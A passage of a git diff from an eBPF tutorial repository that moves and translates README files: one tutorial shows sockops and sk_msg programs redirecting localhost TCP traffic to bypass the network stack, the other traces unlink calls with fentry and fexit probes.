localhost)上的任意 TCP 连接被创建时,根据这个新连接的五元组(源地址,目标地址,源端口,目标端口,协议),在 `sock_ops_map` 这个 BPF MAP 中创建一个条目。这个 BPF MAP 被定义为 `BPF_MAP_TYPE_SOCKHASH` 类型,可以存储套接字和对应的五元组。这样使得每当本地 TCP 连接被创建的时候,这个连接的五元组信息也能够在 BPF MAP 中找到。 + +- `bpf_redirect.bpf.c` 中的 BPF 代码定义了一个网络消息 (sk_msg) 处理程序,当本地套接字上有消息到达时会调用这个程序。然后这个 sk_msg 程序检查该消息是否来自本地地址,如果是,根据获取的五元组信息(源地址,目标地址,源端口,目标端口,协议)在 `sock_ops_map` 查找相应的套接字,并将该消息重定向到在 `sock_ops_map` 中找到的套接字上,这样就实现了绕过内核网络栈。 + +举个例子,我们假设有两个进程在本地运行,进程 A 绑定在 8000 端口上,进程 B 绑定在 9000 端口上,进程 A 向进程 B 发送消息。 + +1. 当进程 A 首次和进程 B 建立 TCP 连接时,触发 `bpf_contrack.bpf.c` 中的 `sockops` 程序,这个程序将五元组 `{127.0.0.1, 127.0.0.1, 8000, 9000, TCP}` 存入 `sock_ops_map`,值为进程 A 的套接字。 + +2. 当进程 A 发送消息时,触发 `bpf_redirect.bpf.c` 中的 `sk_msg` 程序,然后 `sk_msg` 程序将消息从进程 A 的套接字重定向到 `sock_ops_map` 中存储的套接字(进程 A 的套接字)上,因此,消息被直接从进程 A 输送到进程 B,绕过了内核网络栈。 + +这个示例程序就是通过 BPF 实现了在本地通信时,快速将消息从发送者的套接字重定向到接收者的套接字,从而绕过了内核网络栈,以提高传输效率。 + +bpf_redirect.bpf.c + +```c +#include "bpf_sockmap.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +SEC("sk_msg") +int bpf_redir(struct sk_msg_md *msg) +{ + if(msg->remote_ip4 != LOCALHOST_IPV4 || msg->local_ip4!= LOCALHOST_IPV4) + return SK_PASS; + + struct sock_key key = { + .sip = msg->remote_ip4, + .dip = msg->local_ip4, + .dport = bpf_htonl(msg->local_port), /* convert to network byte order */ + .sport = msg->remote_port, + .family = msg->family, + }; + return bpf_msg_redirect_hash(msg, &sock_ops_map, &key, BPF_F_INGRESS); +} +``` + +bpf_contrack.bpf.c + +```c +#include "bpf_sockmap.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +SEC("sockops") +int bpf_sockops_handler(struct bpf_sock_ops *skops){ + u32 family, op; + + family = skops->family; + op = skops->op; + if (op != BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB + && op != BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB) { + return BPF_OK; + } + + if(skops->remote_ip4 != LOCALHOST_IPV4 || skops->local_ip4!= LOCALHOST_IPV4) { + return BPF_OK; + } + + struct sock_key key = { + .dip = skops->remote_ip4, + .sip = skops->local_ip4, + .sport = bpf_htonl(skops->local_port), /* convert to network byte order */ + .dport = skops->remote_port, + .family = skops->family, + }; + + bpf_printk(">>> new connection: OP:%d, PORT:%d --> %d\n", op, bpf_ntohl(key.sport), bpf_ntohl(key.dport)); + + bpf_sock_hash_update(skops, &sock_ops_map, &key, BPF_NOEXIST); + return BPF_OK; +} +``` + +### 编译 eBPF 程序 + +这里我们使用 libbpf 编译这个 eBPF 程序。完整的源代码和工程可以在 中找到。关于如何安装依赖,请参考: + +```shell +# Compile the bpf program with libbpf +make +``` + +### 加载 eBPF 程序 + +我们编写了一个脚本来加载 eBPF 程序,它会自动加载两个 eBPF 程序并创建一个 BPF MAP: + +```shell +sudo ./load.sh +``` + +这个脚本实际上完成了这些操作: + +```sh +#!/bin/bash +set -x +set -e + +sudo mount -t bpf bpf /sys/fs/bpf/ + +# check if old program already loaded +if [ -e "/sys/fs/bpf/bpf_sockops" ]; then + echo ">>> bpf_sockops already loaded, uninstalling..." + ./unload.sh + echo ">>> old program already deleted..." +fi + +# load and attach sock_ops program +sudo bpftool prog load bpf_contrack.bpf.o /sys/fs/bpf/bpf_sockops type sockops pinmaps /sys/fs/bpf/ +sudo bpftool cgroup attach "/sys/fs/cgroup/" sock_ops pinned "/sys/fs/bpf/bpf_sockops" + +# load and attach sk_msg program +sudo bpftool prog load bpf_redirect.bpf.o "/sys/fs/bpf/bpf_redir" map name sock_ops_map pinned "/sys/fs/bpf/sock_ops_map" +sudo bpftool prog attach pinned /sys/fs/bpf/bpf_redir msg_verdict pinned /sys/fs/bpf/sock_ops_map +``` + +这是一个 BPF 的加载脚本。它的主要功能是加载和附加 BPF 程序到内核系统中,并将关联的 BPF map 一并存储(pin)到 BPF 文件系统中,以便 BPF 程序能访问和操作这些 map。 + +让我们详细地看一下脚本的每一行是做什么的。 + +1. `sudo mount -t bpf bpf /sys/fs/bpf/` 这一行用于挂载 BPF 文件系统,使得 BPF 程序和相关的 map 可以被系统访问和操作。 +2. 判断条件 `[ -e "/sys/fs/bpf/bpf_sockops" ]` 是检查是否已经存在 `/sys/fs/bpf/bpf_sockops` 文件,如果存在,则说明 `bpf_sockops` 程序已经被加载到系统中,那么将会通过 `./unload.sh` 脚本将其卸载。 +3. `sudo bpftool prog load bpf_contrack.bpf.o /sys/fs/bpf/bpf_sockops type sockops pinmaps /sys/fs/bpf/` 这一行是加载上文中 `bpf_contrack.bpf.c` 编译得到的 BPF 对象文件 `bpf_contrack.bpf.o` 到 BPF 文件系统中,存储至 `/sys/fs/bpf/bpf_sockops`,并且指定它的类型为 `sockops`。`pinmaps /sys/fs/bpf/` 是指定将加载的 BPF 程序相关的 map 存储在 `/sys/fs/bpf/` 下。 +4. `sudo bpftool cgroup attach "/sys/fs/cgroup/" sock_ops pinned "/sys/fs/bpf/bpf_sockops"` 这一行是将已经加载到 BPF 文件系统的 `bpf_sockops` 程序附加到 cgroup(此路径为"/sys/fs/cgroup/")。附加后,所有属于这个 cgroup 的套接字操作都会受到 `bpf_sockops` 的影响。 +5. `sudo bpftool prog load bpf_redirect.bpf.o "/sys/fs/bpf/bpf_redir" map name sock_ops_map pinned "/sys/fs/bpf/sock_ops_map"` 这一行是加载 `bpf_redirect.bpf.c` 编译得到的 BPF 对象文件 `bpf_redirect.bpf.o` 到 BPF 文件系统中,存储至 `/sys/fs/bpf/bpf_redir` ,并且指定它的相关 map为 `sock_ops_map`,这个map在 `/sys/fs/bpf/sock_ops_map` 中。 +6. `sudo bpftool prog attach pinned /sys/fs/bpf/bpf_redir msg_verdict pinned /sys/fs/bpf/sock_ops_map` 这一行是将已经加载的 `bpf_redir` 附加到 `sock_ops_map` 上,附加方式为 `msg_verdict`,表示当该 map 对应的套接字收到消息时,将会调用 `bpf_redir` 程序处理。 + +综上,此脚本的主要作用就是将两个用于处理本地套接字流量的 BPF 程序分别加载到系统并附加到正确的位置,以便它们能被正确地调用,并且确保它们可以访问和操作相关的 BPF map。 + +您可以使用 [bpftool utility](https://github.com/torvalds/linux/blob/master/tools/bpf/bpftool/Documentation/bpftool-prog.rst) 检查这两个 eBPF 程序是否已经加载。 + +```console +$ sudo bpftool prog show +63: sock_ops name bpf_sockops_handler tag 275467be1d69253d gpl + loaded_at 2019-01-24T13:07:17+0200 uid 0 + xlated 1232B jited 750B memlock 4096B map_ids 58 +64: sk_msg name bpf_redir tag bc78074aa9dd96f4 gpl + loaded_at 2019-01-24T13:07:17+0200 uid 0 + xlated 304B jited 233B memlock 4096B map_ids 58 +``` + +### 使用 iperf3 或 curl 进行测试 + +运行 [iperf3](https://iperf.fr/) 服务器 + +```shell +iperf3 -s -p 5001 +``` + +运行 [iperf3](https://iperf.fr/) 客户端 + +```shell +iperf3 -c 127.0.0.1 -t 10 -l 64k -p 5001 +``` + +或者也可以用 Python 和 curl 进行测试: + +```sh +python3 -m http.server +curl http://0.0.0.0:8000/ +``` + +### 收集追踪 + +查看``sock_ops``追踪本地连接建立 + +```console +$ ./trace_bpf_output.sh # 实际上就是 sudo cat /sys/kernel/debug/tracing/trace_pipe +iperf3-9516 [001] .... 22500.634108: 0: <<< ipv4 op = 4, port 18583 --> 4135 +iperf3-9516 [001] ..s1 22500.634137: 0: <<< ipv4 op = 5, port 4135 --> 18583 +iperf3-9516 [001] .... 22500.634523: 0: <<< ipv4 op = 4, port 19095 --> 4135 +iperf3-9516 [001] ..s1 22500.634536: 0: <<< ipv4 op = 5, port 4135 --> 19095 +``` + +当iperf3 -c建立连接后,你应该可以看到上述用于套接字建立的事件。如果你没有看到任何事件,那么 eBPF 程序可能没有正确地附加上。 + +此外,当``sk_msg``生效后,可以发现当使用 tcpdump 捕捉本地lo设备流量时,只能捕获三次握手和四次挥手流量,而iperf数据流量没有被捕获到。如果捕获到iperf数据流量,那么 eBPF 程序可能没有正确地附加上。 + +```console +$ ./trace_lo_traffic.sh # tcpdump -i lo port 5001 + +# 三次握手 +13:24:07.181804 IP localhost.46506 > localhost.5001: Flags [S], seq 620239881, win 65495, options [mss 65495,sackOK,TS val 1982813394 ecr 0,nop,wscale 7], length 0 +13:24:07.181815 IP localhost.5001 > localhost.46506: Flags [S.], seq 1084484879, ack 620239882, win 65483, options [mss 65495,sackOK,TS val 1982813394 ecr 1982813394,nop,wscale 7], length 0 +13:24:07.181832 IP localhost.46506 > localhost.5001: Flags [.], ack 1, win 512, options [nop,nop,TS val 1982813394 ecr 1982813394], length 0 + +# 四次挥手 +13:24:12.475649 IP localhost.46506 > localhost.5001: Flags [F.], seq 1, ack 1, win 512, options [nop,nop,TS val 1982818688 ecr 1982813394], length 0 +13:24:12.479621 IP localhost.5001 > localhost.46506: Flags [.], ack 2, win 512, options [nop,nop,TS val 1982818692 ecr 1982818688], length 0 +13:24:12.481265 IP localhost.5001 > localhost.46506: Flags [F.], seq 1, ack 2, win 512, options [nop,nop,TS val 1982818694 ecr 1982818688], length 0 +13:24:12.481270 IP localhost.46506 > localhost.5001: Flags [.], ack 2, win 512, options [nop,nop,TS val 1982818694 ecr 1982818694], length 0 +``` + +### 卸载 eBPF 程序 + +```shell +sudo ./unload.sh +``` + +## 参考资料 + +最后,如果您对 eBPF 技术感兴趣,并希望进一步了解和实践,可以访问我们的教程代码仓库 和教程网站 + +- +- + +> 原文地址: 转载请注明出处。 diff --git a/src/29-sockops/README_en.md b/src/29-sockops/README_en.md deleted file mode 100644 index 8548b9f..0000000 --- a/src/29-sockops/README_en.md +++ /dev/null @@ -1,259 +0,0 @@ -# eBPF Development Practices: Accelerating Network Request Forwarding with Sockops - -eBPF (Extended Berkeley Packet Filter) is a powerful feature in the Linux kernel that allows running, loading, and updating user-defined code without the need to modify the kernel source code or reboot the kernel. This capability makes eBPF widely used in various areas such as network and system performance analysis, packet filtering, security policies, etc. - -This tutorial will focus on the application of eBPF in the networking domain, specifically how to use sockops-type eBPF programs to accelerate the forwarding of local network requests. This application is often valuable in scenarios where software load balancers are used for request forwarding, such as using tools like Nginx or HAProxy. - -In many workloads, such as inter-service communication in a microservices architecture, the performance overhead of network requests made through the loopback interface can significantly impact the overall application performance. Since these requests have to go through the local network stack, their processing performance can become a bottleneck, especially in high-concurrency scenarios. To address this issue, sockops-type eBPF programs can be used to accelerate local request forwarding, providing functionality similar to direct memory access (DMA). Sockops programs can manage sockets in the kernel space and directly forward packets between sockets on the local machine, reducing the CPU time required for packet forwarding in the TCP/IP stack. - -This tutorial will demonstrate how to use sockops-type eBPF programs to accelerate network request forwarding through a specific example. To help you understand how to use sockops programs, we will step by step introduce the code of the example program and discuss the working principle of each part. The complete source code and project can be found at . - -## Leveraging eBPF Sockops for Performance Optimization - -Network connections are essentially communication between sockets, and eBPF provides a `bpf_msg_redirect_hash` function that allows packets sent by an application to be directly forwarded to the corresponding socket on the recipient side, greatly accelerating the packet processing flow in the kernel. - -Here, the `sock_map` is a key component that stores socket rules, i.e., it selects an existing socket connection from the `sock_map` based on the current packet information. Therefore, it is necessary to save the socket information to the `sock_map` at the hook of the sockops or elsewhere and provide a rule (usually a four-tuple) to find the socket based on the key. - -The Merbridge project has achieved acceleration for Istio by replacing iptables with eBPF. After using Merbridge (eBPF) optimization, the inbound and outbound traffic bypasses many kernel modules, significantly improving performance, as shown in the following diagram: - -![merbridge](merbridge.png) - -## Example Program - -This example program redirects traffic from the sender’s socket (outgoing) to the recipient’s socket (incoming), bypassing the TCP/IP kernel network stack. In this example, we assume that the sender and recipient are both running on the **same** machine. This example program has two parts that share a map definition: - -bpf_sockmap.h - -```c -#include "vmlinux.h" -#include -#include - -#define LOCALHOST_IPV4 16777343 - -struct sock_key { - __u32 sip; - __u32 dip; - __u32 sport; - __u32 dport; - __u32 family; -}; - -struct { - __uint(type, BPF_MAP_TYPE_SOCKHASH); - __uint(max_entries, 65535); - __type(key, struct sock_key); - __type(value, int); -} sock_ops_map SEC(".maps"); -``` - -The BPF program in this example is divided into two parts: `bpf_redirect.bpf.c` and `bpf_contrack.bpf.c`. - -- The BPF code in `bpf_contrack.bpf.c` defines a socket operation (`sockops`) program, whose main function is to create an entry in the `sock_ops_map` BPF map in which it stores the five-tuple (source address, destination address, source port, destination port, protocol) for each new TCP connection established on the local machine (using localhost). This BPF map is defined as type `BPF_MAP_TYPE_SOCKHASH` and can store sockets and their corresponding five-tuple. This allows the five-tuple information of each local TCP connection to be found in the BPF map whenever the connection is created. - -- The BPF code in `bpf_redirect.bpf.c` defines a sk_msg handler that is called when a message arrives on a local socket. The sk_msg program checks if the message is from a local address, and if so, it retrieves the five-tuple (source address, destination address, source port, destination port, protocol) from the message and looks up the corresponding socket in the `sock_ops_map` using the obtained key. Then, it redirects the message to the socket found in the `sock_ops_map`, thus bypassing the kernel network stack and directly delivering the message from the sender's socket to the receiver's socket. - -For example, let's assume that there are two processes running locally, process A binds to port 8000, and process B binds to port 9000. Process A sends a message to process B. - -1. When the TCP connection is first established between process A and process B, the `sockops` program in `bpf_contrack.bpf.c` is triggered, and it creates an entry in the `sock_ops_map` BPF map for the five-tuple `{127.0.0.1, 127.0.0.1, 8000, 9000, TCP}`, with the value being the socket of process A. - -2. When process A sends a message, the `sk_msg` program in `bpf_redirect.bpf.c` is triggered, and it redirects the message from process A's socket to the socket stored in the `sock_ops_map` based on the obtained five-tuple information (source address, destination address, source port, destination port, protocol). As a result, the message is directly delivered from process A to process B, bypassing the kernel network stack. - -This example program uses BPF to efficiently redirect messages from the sender's socket to the recipient's socket during local communication, bypassing the kernel network stack to improve transmission efficiency. - -bpf_redirect.bpf.c - -```c -#include "bpf_sockmap.h" - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; - -SEC("sk_msg") -int bpf_redir(struct sk_msg_md *msg) -{ - if(msg->remote_ip4 != LOCALHOST_IPV4 || msg->local_ip4!= LOCALHOST_IPV4) - return SK_PASS; - - struct sock_key key = { - .sip = msg->remote_ip4, - .dip = msg->local_ip4, - .dport = bpf_htonl(msg->local_port), /* convert to network byte order */ - .sport = msg->remote_port, - .family = msg->family, - }; - return bpf_msg_redirect_hash(msg, &sock_ops_map, &key, BPF_F_INGRESS); -} -``` - -bpf_contrack.bpf.c - -```c -#include "bpf_sockmap.h" - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; - -SEC("sockops") -int bpf_sockops_handler(struct bpf_sock_ops *skops){ - u32 family, op; - - family = skops->family; - op = skops->op; - if (op != BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB - && op != BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB) { - return BPF_OK; - } - - if(skops->remote_ip4 != LOCALHOST_IPV4 || skops->local_ip4!= LOCALHOST_IPV4) { - return BPF_OK; - } - - struct sock_key key = { - .dip = skops->remote_ip4, - .sip = skops->local_ip4, - .sport = bpf_htonl(skops->local_port), /* convert to network byte order */ - .dport = skops->remote_port, - .family = skops->family, - }; - - bpf_printk(">>> new connection: OP:%d, PORT:%d --> %d\n", op, bpf_ntohl(key.sport), bpf_ntohl(key.dport)); - - bpf_sock_hash_update(skops, &sock_ops_map, &key, BPF_NOEXIST); - return BPF_OK; -} -``` - -### Compiling the eBPF Program - -Here, we use libbpf to compile the eBPF program. The complete source code and project can be found at . - -```shell -# Compile the bpf program with libbpf -make -``` - -### Loading the eBPF Program - -We have created a script to load the eBPF program, which will automatically load both eBPF programs and create a BPF map: - -```shell -sudo ./load.sh -``` - -This script actually performs the following operations: - -```sh -#!/bin/bash -set -x -set -e - -sudo mount -t bpf bpf /sys/fs/bpf/ - -# check if old program already loaded -if [ -e "/sys/fs/bpf/bpf_sockops" ]; then - echo ">>> bpf_sockops already loaded, uninstalling..." - ./unload.sh - echo ">>> old program already deleted..." -fi - -# load and attach sock_ops program -sudo bpftool prog load bpf_contrack.bpf.o /sys/fs/bpf/bpf_sockops type sockops pinmaps /sys/fs/bpf/ -sudo bpftool cgroup attach "/sys/fs/cgroup/" sock_ops pinned "/sys/fs/bpf/bpf_sockops" - -# load and attach sk_msg program -sudo bpftool prog load bpf_redirect.bpf.o "/sys/fs/bpf/bpf_redir" map name sock_ops_map pinned "/sys/fs/bpf/sock_ops_map" -sudo bpftool prog attach pinned /sys/fs/bpf/bpf_redir msg_verdict pinned /sys/fs/bpf/sock_ops_map -``` - -This is a script for loading BPF programs. Its main function is to load and attach BPF programs to the kernel system, and store the associated BPF maps in the BPF file system so that the BPF programs can access and operate on these maps. - -Let's take a detailed look at what each line of the script does. - -1. `sudo mount -t bpf bpf /sys/fs/bpf/` mounts the BPF file system, enabling access to and operation on BPF programs and related maps by the system. -2. The condition check `[ -e "/sys/fs/bpf/bpf_sockops" ]` checks whether the `/sys/fs/bpf/bpf_sockops` file already exists. If it does exist, it means that the `bpf_sockops` program has already been loaded into the system, so it will be uninstalled using the `./unload.sh` script. -3. `sudo bpftool prog load bpf_contrack.bpf.o /sys/fs/bpf/bpf_sockops type sockops pinmaps /sys/fs/bpf/` loads the BPF object file `bpf_contrack.bpf.o` compiled from the `bpf_contrack.bpf.c` into the BPF file system, storing it in `/sys/fs/bpf/bpf_sockops`, and specifying its type as `sockops`. `pinmaps /sys/fs/bpf/` specifies that the BPF maps associated with the loaded BPF program will be stored under `/sys/fs/bpf/`. -4. `sudo bpftool cgroup attach "/sys/fs/cgroup/" sock_ops pinned "/sys/fs/bpf/bpf_sockops"` attaches the `bpf_sockops` program that has been loaded into the BPF file system to the cgroup (the path is `"/sys/fs/cgroup/"`). After the attachment, all socket operations belonging to this cgroup will be affected by the `bpf_sockops` program. -5. `sudo bpftool prog load bpf_redirect.bpf.o "/sys/fs/bpf/bpf_redir" map name sock_ops_map pinned "/sys/fs/bpf/sock_ops_map"` loads the BPF object file `bpf_redirect.bpf.o` compiled from `bpf_redirect.bpf.c` into the BPF file system, storing it in `/sys/fs/bpf/bpf_redir`, and specifying the associated map as `sock_ops_map`, which is located in `/sys/fs/bpf/sock_ops_map`. -6. `sudo bpftool prog attach pinned /sys/fs/bpf/bpf_redir msg_verdict pinned /sys/fs/bpf/sock_ops_map` attaches the already loaded `bpf_redir` program to the `sock_ops_map` using the `msg_verdict` attachment type, which means that when the socket associated with this map receives a message, the `bpf_redir` program will be called to handle it. - -In summary, the main function of this script is to load the two BPF programs used to process local socket traffic into the system and attach them to the correct locations so that they can be correctly called, ensuring that they can access and manipulate the associated BPF maps. - -You can use the [bpftool utility](https://github.com/torvalds/linux/blob/master/tools/bpf/bpftool/Documentation/bpftool-prog.rst) to check if these two eBPF programs have been loaded. - -```console -$ sudo bpftool prog show -63: sock_ops name bpf_sockmap tag 275467be1d69253d gpl - loaded_at 2019-01-24T13:07:17+0200 uid 0 - xlated 1232B jited 750B memlock 4096B map_ids 58 -64: sk_msg name bpf_redir tag bc78074aa9dd96f4 gpl - loaded_at 2019-01-24T13:07:17+0200 uid 0 - xlated 304B jited 233B memlock 4096B map_ids 58 -``` - -### Test with iperf3 or curl - -See to install iperf3. - -Running the iperf3 Server: - -```shell -iperf3 -s -p 5001 -``` - -Running the iperf3 Client: - -```shell -iperf3 -c 127.0.0.1 -t 10 -l 64k -p 5001 -``` - -Or you can use curl and python: - -```sh -python3 -m http.server -curl http://0.0.0.0:8000/ -``` - -### Collecting Traces - -Check the `sock_ops` trace for local connection establishments. - -```console -$ ./trace_bpf_output.sh # which is basically sudo cat /sys/kernel/debug/tracing/trace_pipe -iperf3-9516 [001] .... 22500.634108: 0: <<< ipv4 op = 4, port 18583 --> 4135 -iperf3-9516 [001] ..s1 22500.634137: 0: <<< ipv4 op = 5, port 4135 --> 18583 -iperf3-9516 [001] .... 22500.634523: 0: <<< ipv4 op = 4, port 19095 --> 4135 -iperf3-9516 [001] ..s1 22500.634536: 0: <<< ipv4 op = 5, port 4135 --> 19095 -``` - -When the connection is established between `iperf3 -c` and the server, you should see the events above for socket establishment. If you don't see any events, then the eBPF programs may not have been attached correctly. - -Furthermore, when `sk_msg` takes effect, you should observe that when capturing local traffic on the loopback interface using tcpdump, only the three-way handshake and four-way termination traffic are captured, and the actual data flow of iperf is not captured. If the iperf data flow is captured, then the eBPF programs may not have been attached correctly. - -```console -$ ./trace_lo_traffic.sh # tcpdump -i lo port 5001 - -# Three-way handshake -13:24:07.181804 IP localhost.46506 > localhost.5001: Flags [S], seq 620239881, win 65495, options [mss 65495,sackOK,TS val 1982813394 ecr 0,nop,wscale 7], length 0 -13:24:07.181815 IP localhost.5001 > localhost.46506: Flags [S.], seq 1084484879, ack 620239882, win 65483, options [mss 65495,sackOK,TS val 1982813394 ecr 1982813394,nop,wscale 7], length 0 -13:24:07.181832 IP localhost.46506 > localhost.5001: Flags [.], ack 1, win 512, options [nop,nop,TS val 1982813394 ecr 1982813394], length 0 - -# Four-way termination -13:24:12.475649 IP localhost.46506 > localhost.5001: Flags [F.], seq 1, ack 1, win 512, options [nop,nop,TS val 1982818688 ecr 1982813394], length 0 -13:24:12.479621 IP localhost.5001 > localhost.46506: Flags [.], ack 2, win 512, options [nop,nop,TS val 1982818692 ecr 1982818688], length 0 -13:24:12.481265 IP localhost.5001 > localhost.46506: Flags [F.], seq 1, ack 2, win 512, options [nop,nop,TS val 1982818694 ecr 1982818688], length 0 -13:24:12.481270 IP localhost.46506 > localhost.5001: Flags [.], ack 2, win 512, options [nop,nop,TS val 1982818694 ecr 1982818694], length 0 -``` - -### Unloading the eBPF Program - -```shell -sudo ./unload.sh -``` - -## References - -Finally, if you are interested in eBPF technology and want to learn more and practice further, you can visit our tutorial code repository at and the tutorial website at . - -- -- - -> The original link of this article: diff --git a/src/3-fentry-unlink/README.md b/src/3-fentry-unlink/README.md index 3efd30a..015f9ae 100644 --- a/src/3-fentry-unlink/README.md +++ b/src/3-fentry-unlink/README.md @@ -1,14 +1,14 @@ -# eBPF 入门开发实践教程三:在 eBPF 中使用 fentry 监测捕获 unlink 系统调用 +# eBPF Tutorial by Example 3: Monitoring unlink System Calls with fentry -eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and execute user-defined code at runtime in the kernel. -本文是 eBPF 入门开发实践教程的第三篇,在 eBPF 中使用 fentry 捕获 unlink 系统调用。 +This article is the third part of the eBPF Tutorial by Example, focusing on capturing unlink system calls using fentry in eBPF. ## Fentry -fentry(function entry)和 fexit(function exit)是 eBPF(扩展的伯克利包过滤器)中的两种探针类型,用于在 Linux 内核函数的入口和退出处进行跟踪。它们允许开发者在内核函数执行的特定阶段收集信息、修改参数或观察返回值。这种跟踪和监控功能在性能分析、故障排查和安全分析等场景中非常有用。 +fentry (function entry) and fexit (function exit) are two types of probes in eBPF (Extended Berkeley Packet Filter) used for tracing at the entry and exit points of Linux kernel functions. They allow developers to collect information, modify parameters, or observe return values at specific stages of kernel function execution. This tracing and monitoring functionality is very useful in performance analysis, troubleshooting, and security analysis scenarios. -与 kprobes 相比,fentry 和 fexit 程序有更高的性能和可用性。在这个例子中,我们可以直接访问函数的指针参数,就像在普通的 C 代码中一样,而不需要使用各种读取帮助程序。fexit 和 kretprobe 程序最大的区别在于,fexit 程序可以访问函数的输入参数和返回值,而 kretprobe 只能访问返回值。从 5.5 内核开始,fentry 和 fexit 对 eBPF 程序可用。 +Compared to kprobes, fentry and fexit programs have higher performance and availability. In this example, we can directly access the pointers to the functions' parameters, just like in regular C code, without needing various read helpers. The main difference between fexit and kretprobe programs is that fexit programs can access both the input parameters and return values of a function, while kretprobe programs can only access the return value. Starting from the 5.5 kernel, fentry and fexit are available for eBPF programs. ```c #include "vmlinux.h" @@ -38,30 +38,28 @@ int BPF_PROG(do_unlinkat_exit, int dfd, struct filename *name, long ret) } ``` -这段程序是用 C 语言编写的 eBPF(扩展的伯克利包过滤器)程序,它使用 BPF 的 fentry 和 fexit 探针来跟踪 Linux 内核函数 `do_unlinkat`。在这个教程中,我们将以这段程序作为示例,让您学会如何在 eBPF 中使用 fentry 监测捕获 unlink 系统调用。 +This program is an eBPF (Extended Berkeley Packet Filter) program written in the C language. It uses BPF fentry and fexit probes to trace the Linux kernel function `do_unlinkat`. In this tutorial, we will use this program as an example to learn how to use fentry in eBPF to detect and capture unlink system calls. -程序包含以下部分: +The program consists of the following parts: -1. 包含头文件:包括 vmlinux.h(用于访问内核数据结构)、bpf/bpf_helpers.h(包含eBPF帮助函数)、bpf/bpf_tracing.h(用于eBPF跟踪相关功能)。 -2. 定义许可证:这里定义了一个名为 `LICENSE` 的字符数组,包含许可证信息“Dual BSD/GPL”。 -3. 定义 fentry 探针:我们定义了一个名为 `BPF_PROG(do_unlinkat)` 的 fentry 探针,该探针在 `do_unlinkat` 函数的入口处被触发。这个探针获取当前进程的 PID(进程ID)并将其与文件名一起打印到内核日志。 -4. 定义 fexit 探针:我们还定义了一个名为 `BPF_PROG(do_unlinkat_exit)` 的 fexit 探针,该探针在 `do_unlinkat` 函数的退出处被触发。与 fentry 探针类似,这个探针也会获取当前进程的 PID 并将其与文件名和返回值一起打印到内核日志。 +1. Include header files: including vmlinux.h (for accessing kernel data structures), bpf/bpf_helpers.h (which includes eBPF helper functions), bpf/bpf_tracing.h (for eBPF tracing-related functionalities). +2. Define license: Here, a character array named `LICENSE` is defined, containing the license information "Dual BSD/GPL". +3. Define fentry probe: We define an fentry probe named `BPF_PROG(do_unlinkat)` that is triggered at the entry point of the `do_unlinkat` function. This probe retrieves the PID (Process ID) of the current process and prints it along with the filename to the kernel log. +4. Define fexit probe: We also define an fexit probe named `BPF_PROG(do_unlinkat_exit)` that is triggered at the exit point of the `do_unlinkat` function. Similar to the fentry probe, this probe also retrieves the PID of the current process and prints it along with the filename and return value to the kernel log. -通过这个示例,您可以学习如何在 eBPF 中使用 fentry 和 fexit 探针来监控和捕获内核函数调用,例如在本教程中的 unlink 系统调用。 +Through this example, you can learn how to use fentry and fexit probes in eBPF to monitor and capture kernel function calls, such as the unlink system call in this tutorial. "eunomia-bpf is an open source eBPF dynamic loading runtime and development toolchain combined with Wasm. Its goal is to simplify the development, building, distribution, and running of eBPF programs. You can refer to [here](https://github.com/eunomia-bpf/eunomia-bpf) to download and install the ecc compilation toolchain and ecli runtime. We use eunomia-bpf to compile and run this example. -eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 - -编译运行上述代码: +To compile and run the above code: ```console $ ecc fentry-link.bpf.c Compiling bpf object... Packing ebpf object and config into package.json... $ sudo ecli run package.json -Runing eBPF program... +Running eBPF program... ``` -在另外一个窗口中: +In another window: ```shell touch test_file @@ -70,7 +68,7 @@ touch test_file2 rm test_file2 ``` -运行这段程序后,可以通过查看 `/sys/kernel/debug/tracing/trace_pipe` 文件来查看 eBPF 程序的输出: +After running this program, you can view the output of the eBPF program by examining the `/sys/kernel/debug/tracing/trace_pipe` file: ```console $ sudo cat /sys/kernel/debug/tracing/trace_pipe @@ -80,10 +78,10 @@ $ sudo cat /sys/kernel/debug/tracing/trace_pipe rm-9290 [004] d..2 4637.798843: bpf_trace_printk: fexit: pid = 9290, filename = test_file2, ret = 0 ``` -## 总结 +## Summary -这段程序是一个 eBPF 程序,通过使用 fentry 和 fexit 捕获 `do_unlinkat` 和 `do_unlinkat_exit` 函数,并通过使用 `bpf_get_current_pid_tgid` 和 `bpf_printk` 函数获取调用 do_unlinkat 的进程的 ID、文件名和返回值,并在内核日志中打印出来。 +This program is an eBPF program that captures the `do_unlinkat` and `do_unlinkat_exit` functions using fentry and fexit, and uses `bpf_get_current_pid_tgid` and `bpf_printk` functions to obtain the ID, filename, and return value of the process calling do_unlinkat, and print them in the kernel log. -编译这个程序可以使用 ecc 工具,运行时可以使用 ecli 命令,并通过查看 `/sys/kernel/debug/tracing/trace_pipe` 文件查看 eBPF 程序的输出。更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: +To compile this program, you can use the ecc tool, and to run it, you can use the ecli command, and view the output of the eBPF program by checking the `/sys/kernel/debug/tracing/trace_pipe` file. -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you'd like to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. diff --git a/src/3-fentry-unlink/README.zh.md b/src/3-fentry-unlink/README.zh.md new file mode 100644 index 0000000..3efd30a --- /dev/null +++ b/src/3-fentry-unlink/README.zh.md @@ -0,0 +1,89 @@ +# eBPF 入门开发实践教程三:在 eBPF 中使用 fentry 监测捕获 unlink 系统调用 + +eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 + +本文是 eBPF 入门开发实践教程的第三篇,在 eBPF 中使用 